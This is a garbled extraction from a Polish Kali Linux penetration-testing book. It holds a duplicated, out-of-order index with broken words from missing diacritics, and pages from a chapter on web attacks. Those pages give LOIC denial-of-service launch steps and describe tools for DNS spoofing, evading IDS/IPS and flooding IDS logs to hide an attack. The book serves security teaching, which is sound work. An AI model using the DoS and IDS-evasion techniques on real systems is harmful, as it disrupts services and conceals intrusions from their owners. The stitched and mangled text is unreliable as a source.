Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
